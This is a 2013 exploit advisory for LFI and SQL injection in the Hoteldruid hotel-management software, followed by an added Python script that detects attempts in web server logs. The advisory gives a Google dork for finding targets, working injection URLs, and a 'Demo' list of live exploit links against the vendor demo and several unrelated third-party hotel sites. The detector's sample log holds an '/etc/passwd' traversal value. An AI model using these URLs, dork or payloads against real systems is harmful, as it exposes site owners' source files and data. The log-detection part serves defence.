[+] Author: TUNISIAN CYBER
[+] Exploit Title: Hoteldruid (PHP-residence) v1.X.X (SQLi/LFI) Multiple Vulnerabilities
[+] Date: 14-12-2013
[+] Category: WebApp
[+] Vendor: http://www.hoteldruid.com/en/download.html
[+] Google Dork: inurl:"mostra_sorgente.php"
[+] Tested on: Win7, Ubuntu 13.04

########################################################################################

Description:
Hoteldruid is an open source program for hotel management (property management software). Version 1.x suffers from Local File Inclusion and SQL injection.

I/ LFI:
http://127.0.0.1/php-residence/mostra_sorgente.php?file_sorgente=[FILE]

II/ SQLi:
http://127.0.0.1/php-residence/creaprezzi.php?anno=[YEAR]'
http://127.0.0.1/php-residence/messaggi.php?id_sessione=&anno=[YEAR]'

Fix:
Upgrade to v2.0.3

Demo:
http://www.hoteldruid.com/demo/mostra_sorgente.php?file_sorgente=clienti.php
https://lodginginspirational.com/mostra_sorgente.php?file_sorgente=clienti.php
http://www.at184.com/availability/mostra_sorgente.php?file_sorgente=/
http://www.pantelleriaest.com/hoteldruid/mostra_sorgente.php?file_sorgente=crea_backup.php
http://tbg.evolve2.org/mostra_sorgente.php?file_sorgente=themes/snj/php/menu.php
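For a defender, the two patterns above (a user-controlled file name reaching mostra_sorgente.php, and a non-numeric anno reaching creaprezzi.php or messaggi.php) are easy to spot in web server access logs. The following is added example code, not part of the advisory or of the Hoteldruid project: it parses combined-format log lines (the sample lines are constructed) and flags values of file_sorgente that contain traversal, absolute paths, NUL bytes or stream wrappers, and values of anno that are not a four-digit year. The script and parameter names are taken from the advisory; the log format and the alert rules are assumptions.

```python
"""Flag exploitation attempts against the Hoteldruid endpoints named in the
advisory. Example code written for this page; the log lines below are
constructed and the detection rules are assumptions, not project code."""
import re
from urllib.parse import urlsplit, parse_qs

# Constructed combined-log-format lines (not from any real server).
SAMPLE_LOG = """\
10.0.0.5 - - [14/Dec/2013:10:01:02 +0000] "GET /php-residence/mostra_sorgente.php?file_sorgente=clienti.php HTTP/1.1" 200 5120
10.0.0.9 - - [14/Dec/2013:10:01:10 +0000] "GET /php-residence/mostra_sorgente.php?file_sorgente=../../../../etc/passwd HTTP/1.1" 200 1980
10.0.0.9 - - [14/Dec/2013:10:01:15 +0000] "GET /php-residence/creaprezzi.php?anno=2013%27 HTTP/1.1" 500 311
10.0.0.7 - - [14/Dec/2013:10:02:00 +0000] "GET /php-residence/messaggi.php?id_sessione=&anno=2013 HTTP/1.1" 200 4001
10.0.0.7 - - [14/Dec/2013:10:02:03 +0000] "GET /php-residence/index.php HTTP/1.1" 200 900
"""

# Combined log format: ip ident user [timestamp] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+$'
)

# file_sorgente values that leave the application's own file set:
# parent-directory traversal, absolute paths (POSIX or Windows drive),
# embedded NUL (raw or still percent-encoded) and stream wrappers (php://, http://).
LFI_RE = re.compile(r'(\.\./|\.\.\\|^/|^[a-z]:\\|%00|\x00|^[a-z]+://)', re.I)

# anno is a year; anything else (a quote, a comment marker, a UNION) is suspect.
YEAR_RE = re.compile(r'^\d{4}$')


def classify(line):
    """Parse one log line. Returns None if it is not in the expected format,
    otherwise a dict with the client IP, the script name and a list of
    (rule, offending_value) findings (empty when the request looks benign)."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    script = parts.path.rsplit("/", 1)[-1]
    # parse_qs percent-decodes values, so 2013%27 is seen as 2013'
    query = parse_qs(parts.query, keep_blank_values=True)
    findings = []
    if script == "mostra_sorgente.php":
        for value in query.get("file_sorgente", []):
            if LFI_RE.search(value):
                findings.append(("lfi", value))
    if script in ("creaprezzi.php", "messaggi.php"):
        for value in query.get("anno", []):
            if not YEAR_RE.match(value):
                findings.append(("sqli", value))
    return {"ip": m.group("ip"), "script": script, "findings": findings}


def scan(log_text):
    """Return the records from log_text that carry at least one finding."""
    alerts = []
    for line in log_text.splitlines():
        record = classify(line)
        if record and record["findings"]:
            alerts.append(record)
    return alerts


if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        for rule, value in alert["findings"]:
            print(f'{alert["ip"]} {alert["script"]} {rule}: {value!r}')
```

The rules deliberately do not judge which file names are legitimate arguments to mostra_sorgente.php, since the advisory does not say what the script is meant to serve; a plain value such as clienti.php is therefore not flagged, while traversal, absolute paths and wrappers are. On a live deployment the only real fix is the one the advisory gives, upgrading to v2.0.3; the detection above is for spotting attempts against installations that have not yet been upgraded.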